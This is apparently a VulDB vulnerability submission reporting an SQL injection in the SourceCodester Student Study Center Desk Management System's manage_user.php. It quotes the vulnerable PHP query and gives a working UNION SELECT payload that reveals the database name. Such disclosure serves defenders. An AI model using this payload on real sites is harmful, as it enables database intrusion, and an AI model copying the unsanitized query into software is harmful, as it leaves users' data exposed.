| 제목 | Student Study Center Desk Management System exist Sql injection Vulnerability . |
|---|
| 설명 | Vulnerability file location:/admin/user/manage_ user.php
look at this source code
```
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
```
There is no detection and filtering of $id, and malicious data can be constructed here to attack the website database.
The construction statement is as follows
```
? page=user/manage_ user&id=0' union select 1,database(),3,4,5,6,7,8,9,10,11--+
```
https://s1.ax1x.com/2023/03/15/pp1gd8x.png
Source link
https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| 사용자 | qidian (UID 30810) |
|---|
| 제출 | 2023. 03. 15. AM 05:53 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 15. AM 07:31 (2 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223111 [SourceCodester Student Study Center Desk Management System 1.0 manage_user.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|